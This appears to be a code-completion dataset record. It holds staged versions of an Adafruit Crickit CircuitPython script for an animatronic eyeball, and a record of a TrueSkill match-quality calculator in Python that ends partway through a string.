decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ss = crickit.seesaw
button = crickit.SIGNAL1
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0)
audio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']
current_audio_file = 0
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
import time
import random
import board
import audiomp3
import audiopwmio
from adafruit_crickit import crickit
ss = crickit.seesaw
button = crickit.SIGNAL1
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0)
audio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']
current_audio_file = 0
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
# SPDX-FileCopyrightText: 2021 John Park for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
import random
import board
import audiomp3
import audiopwmio
from adafruit_crickit import crickit
ss = crickit.seesaw # Crickit seesaw setup
button = crickit.SIGNAL1 # momentary switch to trigger animation
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4 # standard LED for eyeball lighting
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8 # attract mode switch or jumper
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0) # Feather outputs this pin to Crickit amplifier
audio_files = [ # use your own mono .mp3 files
"phrase_01.mp3",
"phrase_02.mp3",
"phrase_03.mp3"
]
current_audio_file = 0
# two motors
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1 # full speed open
time.sleep(0.25)
motor_lid.throttle = 0 # hold
def close_lid():
motor_lid.throttle = -1 # full speed closed
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random()) # 0 to 1.0 seconds
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch): # regular mode, attrack switch not closed/shorted
if not ss.digital_read(button): # button has been pressed
decoder = audiomp3.MP3Decoder(open("ring.mp3", "rb"))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True) # light the eye
decoder = audiomp3.MP3Decoder(open(audio_files[current_audio_file], "rb"))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0 # audio is finished, pause the eye
blink(5)
close_lid()
current_audio_file = ((current_audio_file + 1) % (len(audio_files))) # go to next file
else: # attract mode
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
|
flexible
|
{
"blob_id": "608c116cd42132bd63be5056f0aaf5c78933886e",
"index": 7536,
"step-1": "<mask token>\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\n<mask token>\n",
"step-2": "<mask token>\nss.pin_mode(button, ss.INPUT_PULLUP)\n<mask token>\nss.pin_mode(LED, ss.OUTPUT)\n<mask token>\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\n<mask token>\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-3": "<mask token>\nss = crickit.seesaw\nbutton = crickit.SIGNAL1\nss.pin_mode(button, ss.INPUT_PULLUP)\nLED = crickit.SIGNAL4\nss.pin_mode(LED, ss.OUTPUT)\nattract_switch = crickit.SIGNAL8\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\naudio = audiopwmio.PWMAudioOut(board.A0)\naudio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']\ncurrent_audio_file = 0\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-4": "import time\nimport random\nimport board\nimport audiomp3\nimport audiopwmio\nfrom adafruit_crickit import crickit\nss = crickit.seesaw\nbutton = crickit.SIGNAL1\nss.pin_mode(button, ss.INPUT_PULLUP)\nLED = crickit.SIGNAL4\nss.pin_mode(LED, ss.OUTPUT)\nattract_switch = crickit.SIGNAL8\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\naudio = audiopwmio.PWMAudioOut(board.A0)\naudio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']\ncurrent_audio_file = 0\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-5": "# SPDX-FileCopyrightText: 2021 John Park for Adafruit Industries\n# SPDX-License-Identifier: MIT\nimport time\nimport random\nimport board\nimport audiomp3\nimport audiopwmio\nfrom adafruit_crickit import crickit\n\nss = crickit.seesaw # Crickit seesaw setup\n\nbutton = crickit.SIGNAL1 # momentary switch to trigger animation\nss.pin_mode(button, ss.INPUT_PULLUP)\n\nLED = crickit.SIGNAL4 # standard LED for eyeball lighting\nss.pin_mode(LED, ss.OUTPUT)\n\nattract_switch = crickit.SIGNAL8 # attract mode switch or jumper\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\n\naudio = audiopwmio.PWMAudioOut(board.A0) # Feather outputs this pin to Crickit amplifier\naudio_files = [ # use your own mono .mp3 files\n \"phrase_01.mp3\",\n \"phrase_02.mp3\",\n \"phrase_03.mp3\"\n]\ncurrent_audio_file = 0\n\n# two motors\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\ndef open_lid():\n motor_lid.throttle = 1 # full speed open\n time.sleep(0.25)\n motor_lid.throttle = 0 # hold\n\ndef close_lid():\n motor_lid.throttle = -1 # full speed closed\n time.sleep(0.25)\n motor_lid.throttle = 0\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random()) # 0 to 1.0 seconds\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\n\nwhile True:\n if ss.digital_read(attract_switch): # regular mode, attrack switch not closed/shorted\n if not ss.digital_read(button): # button has been pressed\n decoder = audiomp3.MP3Decoder(open(\"ring.mp3\", \"rb\"))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True) # light the eye\n decoder = audiomp3.MP3Decoder(open(audio_files[current_audio_file], \"rb\"))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0 # audio is finished, pause the eye\n blink(5)\n close_lid()\n current_audio_file = ((current_audio_file + 1) % (len(audio_files))) # go to next file\n\n else: # attract mode\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
<|reserved_special_token_0|>
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
<|reserved_special_token_0|>
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, 'gameInfo')
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, 'gameInfo')
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, \
getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, "gameInfo")
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose
betaSquared = gameInfo.beta**2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix
aTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = (start * middleInverse * end) * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = (e**expPart) * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)
|
flexible
|
{
"blob_id": "009be282e45d191eb8f4d7d2986a2f182d64c1dd",
"index": 2935,
"step-1": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n <mask token>\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 